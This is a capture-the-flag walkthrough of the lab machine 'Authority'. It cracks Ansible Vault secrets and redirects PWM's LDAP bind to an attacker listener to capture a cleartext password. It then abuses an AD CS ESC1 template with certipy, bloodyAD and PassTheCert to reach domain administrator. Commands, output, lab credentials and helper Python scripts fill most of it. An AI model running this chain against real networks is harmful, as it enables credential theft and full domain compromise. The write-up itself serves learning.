Authority
Recon
SMB
We can reach SMB as an unauthenticated (anonymous) user. There is a Development share we have read access to, so let's dump it.
└─$ netexec smb authority.htb -u 'anonymous' -p '' --shares --smb-timeout 1000
SMB 10.129.229.56 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.56 445 AUTHORITY [+] authority.htb\anonymous:
SMB 10.129.229.56 445 AUTHORITY [*] Enumerated shares
SMB 10.129.229.56 445 AUTHORITY Share Permissions Remark
SMB 10.129.229.56 445 AUTHORITY ----- ----------- ------
SMB 10.129.229.56 445 AUTHORITY ADMIN$ Remote Admin
SMB 10.129.229.56 445 AUTHORITY C$ Default share
SMB 10.129.229.56 445 AUTHORITY Department Shares
SMB 10.129.229.56 445 AUTHORITY Development READ
SMB 10.129.229.56 445 AUTHORITY IPC$ READ Remote IPC
SMB 10.129.229.56 445 AUTHORITY NETLOGON Logon server share
SMB 10.129.229.56 445 AUTHORITY SYSVOL Logon server share
└─$ netexec smb authority.htb -u 'anonymous' -p '' --shares --smb-timeout 1000 -M spider_plus -o DOWNLOAD_FLAG=True
SPIDER_PLUS 10.129.229.56 445 AUTHORITY [+] Saved share-file metadata to "/tmp/nxc_spider_plus/10.129.229.56.json".
└─$ lta /tmp/nxc_spider_plus/10.129.229.56/Development/Automation/Ansible/
drwxrwxr-x - woyag 7 Dec 12:11 /tmp/nxc_spider_plus/10.129.229.56/Development/Automation/Ansible
drwxrwxr-x - woyag 7 Dec 12:11 ├── ADCS
.rw-rw-r-- 259 woyag 7 Dec 12:10 │ ├── .ansible-lint
.rw-rw-r-- 205 woyag 7 Dec 12:10 │ ├── .yamllint
drwxrwxr-x - woyag 7 Dec 12:10 │ ├── defaults
.rw-rw-r-- 1.6k woyag 7 Dec 12:10 │ │ └── main.yml
.rw-rw-r-- 11k woyag 7 Dec 12:10 │ ├── LICENSE
drwxrwxr-x - woyag 7 Dec 12:10 │ ├── meta
.rw-rw-r-- 549 woyag 7 Dec 12:10 │ │ ├── main.yml
.rw-rw-r-- 22 woyag 7 Dec 12:10 │ │ └── preferences.yml
drwxrwxr-x - woyag 7 Dec 12:10 │ ├── molecule
drwxrwxr-x - woyag 7 Dec 12:11 │ │ └── default
.rw-rw-r-- 106 woyag 7 Dec 12:10 │ │ ├── converge.yml
.rw-rw-r-- 526 woyag 7 Dec 12:11 │ │ ├── molecule.yml
.rw-rw-r-- 371 woyag 7 Dec 12:11 │ │ └── prepare.yml
.rw-rw-r-- 7.3k woyag 7 Dec 12:11 │ ├── README.md
.rw-rw-r-- 466 woyag 7 Dec 12:11 │ ├── requirements.txt
.rw-rw-r-- 264 woyag 7 Dec 12:11 │ ├── requirements.yml
.rw-rw-r-- 924 woyag 7 Dec 12:11 │ ├── SECURITY.md
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── tasks
.rw-rw-r-- 2.9k woyag 7 Dec 12:11 │ │ ├── assert.yml
.rw-rw-r-- 2.3k woyag 7 Dec 12:11 │ │ ├── generate_ca_certs.yml
.rw-rw-r-- 1.2k woyag 7 Dec 12:11 │ │ ├── init_ca.yml
.rw-rw-r-- 1.4k woyag 7 Dec 12:11 │ │ ├── main.yml
.rw-rw-r-- 4.2k woyag 7 Dec 12:11 │ │ └── requests.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── templates
.rw-rw-r-- 1.7k woyag 7 Dec 12:11 │ │ ├── extensions.cnf.j2
.rw-rw-r-- 11k woyag 7 Dec 12:11 │ │ └── openssl.cnf.j2
.rw-rw-r-- 419 woyag 7 Dec 12:11 │ ├── tox.ini
drwxrwxr-x - woyag 7 Dec 12:11 │ └── vars
.rw-rw-r-- 2.1k woyag 7 Dec 12:11 │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 ├── LDAP
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── .bin
.rw-rw-r-- 677 woyag 7 Dec 12:11 │ │ ├── clean_vault
.rw-rw-r-- 357 woyag 7 Dec 12:11 │ │ ├── diff_vault
.rw-rw-r-- 768 woyag 7 Dec 12:11 │ │ └── smudge_vault
.rw-rw-r-- 1.4k woyag 7 Dec 12:11 │ ├── .travis.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── defaults
.rw-rw-r-- 1.0k woyag 7 Dec 12:11 │ │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── files
.rw-rw-r-- 170 woyag 7 Dec 12:11 │ │ └── pam_mkhomedir
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── handlers
.rw-rw-r-- 277 woyag 7 Dec 12:11 │ │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── meta
.rw-rw-r-- 416 woyag 7 Dec 12:11 │ │ └── main.yml
.rw-rw-r-- 5.8k woyag 7 Dec 12:11 │ ├── README.md
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── tasks
.rw-rw-r-- 5.2k woyag 7 Dec 12:11 │ │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── templates
.rw-rw-r-- 131 woyag 7 Dec 12:11 │ │ ├── ldap_sudo_groups.j2
.rw-rw-r-- 106 woyag 7 Dec 12:11 │ │ ├── ldap_sudo_users.j2
.rw-rw-r-- 2.6k woyag 7 Dec 12:11 │ │ ├── sssd.conf.j2
.rw-rw-r-- 30 woyag 7 Dec 12:11 │ │ └── sudo_group.j2
.rw-rw-r-- 119 woyag 7 Dec 12:11 │ ├── TODO.md
.rw-rw-r-- 640 woyag 7 Dec 12:11 │ ├── Vagrantfile
drwxrwxr-x - woyag 7 Dec 12:11 │ └── vars
.rw-rw-r-- 174 woyag 7 Dec 12:11 │ ├── debian.yml
.rw-rw-r-- 75 woyag 7 Dec 12:11 │ ├── main.yml
.rw-rw-r-- 222 woyag 7 Dec 12:11 │ ├── redhat.yml
.rw-rw-r-- 203 woyag 7 Dec 12:11 │ └── ubuntu-14.04.yml
drwxrwxr-x - woyag 7 Dec 12:11 ├── PWM
.rw-rw-r-- 491 woyag 7 Dec 12:11 │ ├── ansible.cfg
.rw-rw-r-- 174 woyag 7 Dec 12:11 │ ├── ansible_inventory
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── defaults
.rw-rw-r-- 1.6k woyag 7 Dec 12:11 │ │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── handlers
.rw-rw-r-- 4 woyag 7 Dec 12:11 │ │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── meta
.rw-rw-r-- 199 woyag 7 Dec 12:11 │ │ └── main.yml
.rw-rw-r-- 1.3k woyag 7 Dec 12:11 │ ├── README.md
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── tasks
.rw-rw-r-- 1.8k woyag 7 Dec 12:11 │ │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ └── templates
.rw-rw-r-- 422 woyag 7 Dec 12:11 │ ├── context.xml.j2
.rw-rw-r-- 388 woyag 7 Dec 12:11 │ └── tomcat-users.xml.j2
drwxrwxr-x - woyag 7 Dec 12:11 └── SHARE
drwxrwxr-x - woyag 7 Dec 12:11 └── tasks
.rw-rw-r-- 1.9k woyag 7 Dec 12:11 └── main.yml

Creds:
T0mc@tAdm1n:T0mc@tR00t
The PWM role's defaults/main.yml holds three Ansible Vault-encrypted variables (ldap_admin_password, pwm_admin_login, pwm_admin_password). Save each $ANSIBLE_VAULT block to its own file and convert it with ansible2john:

└─$ ansible2john ldap_admin_password.txt > ldap_admin_password.hash
└─$ ansible2john pwm_admin_login.txt > pwm_admin_login.hash
└─$ ansible2john pwm_admin_password.txt > pwm_admin_password.hash
└─$ cat *.hash > hashes
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
!@#$%^&* (pwm_admin_password.txt)
!@#$%^&* (pwm_admin_login.txt)
!@#$%^&* (ldap_admin_password.txt)
Vault password (the same one for all three blobs):
!@#$%^&*
https://www.bengrewell.com/cracking-ansible-vault-secrets-with-hashcat/
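Why these blobs crack offline, as an added example (my code, not part of the original writeup and not Ansible's own implementation): a Vault 1.1 AES256 payload is the hex encoding of "salt\nhmac\nciphertext", the keys come from PBKDF2-HMAC-SHA256 with 10,000 iterations, and a candidate password can be tested with nothing but the HMAC over the ciphertext, which is exactly what ansible2john extracts for john. The sample vault is constructed inside the block (fake ciphertext bytes, an all-zero salt) around the password recovered above; the real AES-256-CTR step is omitted because the standard library has no AES, so this verifies passwords but does not decrypt.

```python
import hashlib
import hmac
import os
from binascii import hexlify, unhexlify

VAULT_HEADER = "$ANSIBLE_VAULT;1.1;AES256"
PBKDF2_ITERATIONS = 10000   # what Ansible's VaultAES256 cipher uses
KEY_LEN, IV_LEN = 32, 16    # AES-256 key and AES-CTR IV sizes


def parse_vault(text):
    """Split a vault payload into (salt, hmac_hex, ciphertext).

    On disk: header line, then the hex encoding (wrapped at 80 columns)
    of b"salt_hex\\nhmac_hex\\nciphertext_hex". Indented `!vault |`
    blocks from a YAML file parse too because every line is stripped.
    """
    lines = text.strip().splitlines()
    if lines[0].strip() != VAULT_HEADER:
        raise ValueError("not an Ansible Vault 1.1 AES256 payload")
    inner = unhexlify("".join(l.strip() for l in lines[1:]))
    salt_hex, mac_hex, ct_hex = inner.split(b"\n")
    return unhexlify(salt_hex), mac_hex.decode(), unhexlify(ct_hex)


def derive_keys(password, salt):
    """PBKDF2-HMAC-SHA256 -> (aes_key, hmac_key, iv), as Ansible derives them."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                             PBKDF2_ITERATIONS, dklen=2 * KEY_LEN + IV_LEN)
    return dk[:KEY_LEN], dk[KEY_LEN:2 * KEY_LEN], dk[2 * KEY_LEN:]


def check_password(text, password):
    """True if the password re-derives the HMAC key that authenticates
    the ciphertext. This is the per-candidate test john/hashcat run:
    one PBKDF2 call and one HMAC, no AES needed."""
    salt, mac_hex, ct = parse_vault(text)
    _, hmac_key, _ = derive_keys(password, salt)
    calc = hmac.new(hmac_key, ct, hashlib.sha256).hexdigest()
    return hmac.compare_digest(calc, mac_hex)


def crack(text, candidates):
    """Return the first candidate that verifies, or None."""
    for cand in candidates:
        if check_password(text, cand):
            return cand
    return None


def make_vault(password, ciphertext, salt=None):
    """Build a syntactically valid vault envelope around an already
    encrypted body. Constructed for this example: only the KDF and the
    HMAC wrapper are reproduced, the AES-256-CTR encryption is not."""
    if salt is None:
        salt = os.urandom(32)
    _, hmac_key, _ = derive_keys(password, salt)
    mac = hmac.new(hmac_key, ciphertext, hashlib.sha256).hexdigest().encode()
    inner = b"\n".join([hexlify(salt), mac, hexlify(ciphertext)])
    body = hexlify(inner).decode()
    wrapped = "\n".join(body[i:i + 80] for i in range(0, len(body), 80))
    return VAULT_HEADER + "\n" + wrapped + "\n"


# Constructed sample: 32 bytes of fake ciphertext (two AES blocks) sealed
# with the vault password recovered on this box.
SAMPLE_PASSWORD = "!@#$%^&*"
SAMPLE_VAULT = make_vault(SAMPLE_PASSWORD, bytes(range(32)), salt=bytes(32))

if __name__ == "__main__":
    print(SAMPLE_VAULT)
    print(crack(SAMPLE_VAULT, ["password", "123456", SAMPLE_PASSWORD]))
```

The cost per guess is 10,000 rounds of PBKDF2-SHA256, which a GPU rig chews through at millions per second, so a vault password that is in rockyou.txt gives no protection at all; the only real defence is a long random passphrase, and never committing vault material to a share anyone can read.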
└─$ sudo apt install ansible-core -y
└─$ cat ansible/ldap_admin_password.txt | ansible-vault decrypt
Vault password:
Decryption successful
DevT3st@123
└─$ cat ansible/pwm_admin_login.txt | ansible-vault decrypt
Vault password:
Decryption successful
svc_pwm
└─$ cat ansible/pwm_admin_password.txt | ansible-vault decrypt
Vault password:
Decryption successful
pWm_@dm!N_!23
Creds:
svc_pwm:pWm_@dm!N_!23
LDAP admin password:
DevT3st@123
HTTPS (8443)

PWM is an open source password self-service application for LDAP directories.
The dropdown arrow shows the version: PWM v2.0.3 bc96802e, a few releases behind the current one (https://github.com/pwm-project/pwm/releases).
The credentials from SMB (T0mc@tAdm1n:T0mc@tR00t) don't work.

The second set of Ansible credentials (svc_pwm:pWm_@dm!N_!23) is rejected as well, but the password pWm_@dm!N_!23 on its own logs us in to the Configuration Manager, which only prompts for a password.

We can download the configuration file. It contains a password hash and an additional username, but that account can't be used with any of the credentials found so far.
<setting key="ldap.proxy.username" modifyTime="2022-08-11T01:46:23Z" profile="default" syntax="STRING" syntaxVersion="0">
<label>LDAP ⇨ LDAP Directories ⇨ default ⇨ Connection ⇨ LDAP Proxy User</label>
<value>CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb</value>
</setting>
The hash isn't going to crack any time soon, so I'm giving up on that.
There are too many settings and it's overwhelming to explore; the deeper you go the less you understand, and most of it is left at defaults. The Connection section holds the LDAP Proxy Password, but it's stored protected and can't be read back from the UI. The LDAP URL list is editable, though, and PWM binds to whatever server is listed there using that proxy account, so we add our own host and capture the bind.

Add ldap://10.10.14.113:636 to the LDAP URLs and hit Test (the scheme is ldap://, not ldaps://, so the bind arrives in cleartext regardless of the port), then wait for the callback:
└─$ yes | ncat -lvnkp 636
Ncat: Connection from 10.129.229.56:62553.
0Y`T;CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htblDaP_1n_th3_cle4r!
New credentials, but the DN and the password run together: the capture is a raw BER-encoded LDAP simple BindRequest, and the tag and length bytes that separate the DN octet string from the password are non-printable, so the terminal shows them back to back. The password is everything after the DN's last RDN, DC=htb.
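To show where the boundary really is, here is an added example (my code, not from the original writeup and not from PWM) that rebuilds the BindRequest from the values on this page and parses it back by walking the BER TLVs instead of eyeballing the string. The messageID of 1 is an assumption; the printable bytes "0Y`T;" in the capture are the SEQUENCE header, the BindRequest header and the DN length, and everything else matches what ncat printed.

```python
def _read_tlv(buf, pos):
    """Read one BER TLV at pos and return (tag, value, next_pos).
    Short and long-form definite lengths only: LDAP (RFC 4511) forbids
    indefinite lengths, so no 0x80 terminator handling is needed."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _read_int(value):
    return int.from_bytes(value, "big", signed=True)


def parse_bind_request(data):
    """Decode LDAPMessage { messageID, BindRequest { version, name, simple } }.
    Raises ValueError for anything that is not a simple (cleartext) bind."""
    tag, msg, _ = _read_tlv(data, 0)
    if tag != 0x30:                       # SEQUENCE
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, pos = _read_tlv(msg, 0)
    if tag != 0x02:                       # INTEGER messageID
        raise ValueError("missing messageID")
    tag, op, _ = _read_tlv(msg, pos)
    if tag != 0x60:                       # [APPLICATION 0] BindRequest
        raise ValueError("protocolOp is not a BindRequest (tag 0x%02x)" % tag)
    tag, ver, pos = _read_tlv(op, 0)      # INTEGER version (3)
    tag, name, pos = _read_tlv(op, pos)   # OCTET STRING bind DN
    tag, auth, _ = _read_tlv(op, pos)
    if tag != 0x80:                       # [0] simple; 0xA3 would be SASL
        raise ValueError("not a simple bind, no cleartext password here")
    return {"message_id": _read_int(mid), "version": _read_int(ver),
            "name": name.decode(), "password": auth.decode()}


def _tlv(tag, value):
    """Encode one TLV with a definite length."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def build_simple_bind(message_id, name, password, version=3):
    """The client side of the exchange: what PWM sent to our listener."""
    op = (_tlv(0x02, bytes([version]))
          + _tlv(0x04, name.encode())
          + _tlv(0x80, password.encode()))
    return _tlv(0x30, _tlv(0x02, bytes([message_id])) + _tlv(0x60, op))


# Constructed reproduction of the capture. The control bytes ncat's output
# swallowed are messageID (02 01 01), version (02 01 03) and the password
# tag/length (80 12); the DN length 0x3B is the ';' that was visible.
CAPTURED = build_simple_bind(
    1, "CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb",
    "lDaP_1n_th3_cle4r!")

if __name__ == "__main__":
    print(CAPTURED)
    print(parse_bind_request(CAPTURED))
```

If the URL had been ldaps://, the same request would have been wrapped in TLS and the listener would have needed a certificate to terminate it; the cleartext capture worked only because PWM was told to use plain ldap:// on port 636.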
Creds:
svc_ldap:lDaP_1n_th3_cle4r!
└─$ netexec smb authority.htb -u 'svc_ldap' -p 'htblDaP_1n_th3_cle4r!'
SMB 10.129.229.56 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.56 445 AUTHORITY [-] authority.htb\svc_ldap:htblDaP_1n_th3_cle4r! STATUS_LOGON_FAILURE
└─$ netexec smb authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'
SMB 10.129.229.56 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.56 445 AUTHORITY [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r!
WinRM
└─$ netexec winrm authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'
WINRM 10.129.229.56 5985 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 (name:AUTHORITY) (domain:authority.htb)
WINRM 10.129.229.56 5985 AUTHORITY [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r! (Pwn3d!)
└─$ evil-winrm -i authority.htb -u svc_ldap -p 'lDaP_1n_th3_cle4r!'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> whoami /all
User Name SID
============ =============================================
htb\svc_ldap S-1-5-21-622327497-3269355298-2248959698-1601
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
User.txt
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> cat ../Desktop/user.txt
2be9deb850ae73c7e96fc2bcffe65046
Privilege Escalation
We could run the default enumeration (winPEAS + BloodHound), but given the box name and svc_ldap's membership in Certificate Service DCOM Access, this is almost certainly about misconfigured AD CS certificate templates.
└─$ certipy-ad find -vulnerable -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : AUTHORITY-CA
DNS Name : authority.authority.htb
Certificate Subject : CN=AUTHORITY-CA, DC=authority, DC=htb
Certificate Serial Number : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Certificate Validity Start : 2023-04-24 01:46:26+00:00
Certificate Validity End : 2123-04-24 01:56:25+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : AUTHORITY.HTB\Administrators
Access Rights
ManageCertificates : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
ManageCa : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Enroll : AUTHORITY.HTB\Authenticated Users
Certificate Templates
0
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : AutoEnrollmentCheckUserDsCertificate
PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Document Signing
IP security IKE intermediate
IP security use
KDC Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 20 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AUTHORITY.HTB\Domain Computers
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Object Control Permissions
Owner : AUTHORITY.HTB\Administrator
Write Owner Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Dacl Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Property Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
https://github.com/ly4k/Certipy?tab=readme-ov-file#esc1
https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc1-template-allows-san
https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/ad-cs-abuse/esc1
Enrollment rights on CorpVPN are granted to Domain Computers, not to users, so to abuse this we need a computer account. Any authenticated user can create one as long as MachineAccountQuota (default 10) hasn't been set to 0, so let's check that.
└─$ netexec ldap authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -L
...
[*] maq Retrieves the MachineAccountQuota domain-level attribute
└─$ netexec ldap authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -M maq
SMB 10.129.229.56 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.229.56 636 AUTHORITY [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r!
MAQ 10.129.229.56 389 AUTHORITY [*] Getting the MachineAccountQuota
MAQ 10.129.229.56 389 AUTHORITY MachineAccountQuota: 10
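The predicate certipy just applied, written out as an added example in Python (my code, not certipy's): a template is ESC1-able when it is enabled, needs no manager approval or extra signatures, lets the enrollee supply the subject, carries a client-authentication EKU (or none at all), and can be enrolled by a principal we control, on a CA that also lets us enroll. The CA and template records are constructed by hand from the certipy output above, and a hardened copy of CorpVPN shows which single flag removes the finding. The MachineAccountQuota handling is the point made above: Domain Computers only counts as "us" if we already hold a computer account or MAQ lets us create one.

```python
# EKUs that make a certificate usable for domain logon (names as certipy prints them)
CLIENT_AUTH_EKUS = {
    "Client Authentication",          # 1.3.6.1.5.5.7.3.2
    "PKINIT Client Authentication",   # 1.3.6.1.5.2.3.4
    "Smart Card Logon",               # 1.3.6.1.4.1.311.20.2.2
    "Any Purpose",                    # 2.5.29.37.0
}


def allows_client_auth(ekus):
    # A template with no EKU at all is also accepted for logon.
    return not ekus or bool(CLIENT_AUTH_EKUS & set(ekus))


def esc1_findings(templates, ca, low_priv, maq=0):
    """Return [(template name, reason)] for every ESC1-able template.

    low_priv: principals we control or are a member of. 'Domain Computers'
    is added automatically when maq > 0, because we can then create a
    computer account ourselves (bloodyAD add computer, as on this box).
    """
    controllable = set(low_priv)
    if maq > 0:
        controllable.add("Domain Computers")
    if not controllable & set(ca["enroll"]):
        return []                         # the CA itself denies us enrollment
    out = []
    for t in templates:
        if not t["enabled"] or t["manager_approval"] or t["signatures_required"] > 0:
            continue
        if "EnrolleeSuppliesSubject" not in t["name_flags"]:
            continue                      # CA builds the subject from AD: no SAN injection
        if not allows_client_auth(t["ekus"]):
            continue
        who = controllable & set(t["enroll"])
        if who:
            out.append((t["name"], "%s can enroll, supplies SAN, client auth EKU"
                        % ", ".join(sorted(who))))
    return out


# Constructed from the certipy output on this box.
CA = {"name": "AUTHORITY-CA", "enroll": ["Authenticated Users"]}
CORP_VPN = {
    "name": "CorpVPN", "enabled": True, "manager_approval": False,
    "signatures_required": 0, "name_flags": ["EnrolleeSuppliesSubject"],
    "ekus": ["Encrypting File System", "Secure Email", "Client Authentication",
             "Document Signing", "IP security IKE intermediate",
             "IP security use", "KDC Authentication"],
    "enroll": ["Domain Computers", "Domain Admins", "Enterprise Admins"],
}
# Hardened copy: the subject comes from the requester's AD object instead.
FIXED_VPN = dict(CORP_VPN, name="CorpVPN-fixed", name_flags=["SubjectAltRequireUpn"])

if __name__ == "__main__":
    us = ["Authenticated Users", "Domain Users"]
    print(esc1_findings([CORP_VPN, FIXED_VPN], CA, us, maq=10))
    print(esc1_findings([CORP_VPN, FIXED_VPN], CA, us, maq=0))
```

Requiring manager approval or a single authorized signature would also close the hole; the fix usually chosen is to clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT so the CA never trusts a requester-chosen UPN.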
https://www.thehacker.recipes/ad/movement/builtins/machineaccountquota#create-a-computer-account
# bloodyad -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --host "$DC_HOST" add computer 'SomeName' 'SomePassword'
└─$ bloodyAD -d 'authority.htb' -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' --host '10.129.229.56' add computer 'Letmein' 'Password123$'
[+] Letmein created
Verify that it was created:
└─$ netexec ldap authority.htb -u 'Letmein$' -p 'Password123$'
SMB 10.129.229.56 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.229.56 636 AUTHORITY [+] authority.htb\Letmein$:Password123$
└─$ netexec ldap authority.htb -u 'Letmein$' -p 'Password123$x'
SMB 10.129.229.56 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
LDAP 10.129.229.56 389 AUTHORITY [-] authority.htb\Letmein$:Password123$x
Perform the ESC1 attack. faketime is used throughout to shift our clock onto the DC's, since Kerberos rejects requests with more than 5 minutes of skew:
└─$ USER='Letmein$'
PASSWORD='Password123$'
DOMAIN='authority.htb'
DC_IP='10.129.229.56'
CA='AUTHORITY-CA'
TEMPLATE='CorpVPN'
faketime -f +4h certipy-ad req -u "$USER" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$DOMAIN" -ca "$CA" -template "$TEMPLATE" -upn "administrator@$DOMAIN"
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
└─$ faketime -f +4h certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
KDC_ERR_PADATA_TYPE_NOSUPP means the KDC doesn't support PKINIT: the DC has no certificate of its own for Kerberos authentication, so our certificate can't be turned into a TGT. It is still valid for client authentication over TLS, so we use it against LDAPS (Schannel) with PassTheCert instead.
https://www.thehacker.recipes/ad/movement/schannel/passthecert
└─$ git clone https://github.com/AlmondOffSec/PassTheCert.git
└─$ USER='administrator'
DOMAIN='authority.htb'
DC_IP='10.129.229.56'
# split the PFX into the PEM certificate and key that passthecert.py expects
certipy-ad cert -pfx "$USER.pfx" -nokey -out "$USER.crt"
certipy-ad cert -pfx "$USER.pfx" -nocert -out "$USER.key"
py ./PassTheCert/Python/passthecert.py -action ldap-shell -crt "$USER.crt" -key "$USER.key" -domain "$DOMAIN" -dc-ip "$DC_IP"
# equivalent without PassTheCert, straight from the PFX:
# certipy-ad auth -pfx "$USER.pfx" -dc-ip "$DC_IP" -ldap-shell
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'administrator.crt'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing private key to 'administrator.key'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# whoami
u:HTB\Administrator
Path 1
One option is to create a new domain user and add it to privileged groups, or add an account we already control (svc_ldap) to those groups.
# add_user letmein
Attempting to create user in: %s CN=Users,DC=authority,DC=htb
Adding new user with username: letmein and password: jJyH[By!sym9;(I result: OK
# add_user_to_group letmein 'Domain Admins'
# add_user_to_group letmein 'Administrators'
# add_user_to_group letmein 'Remote Management Users'
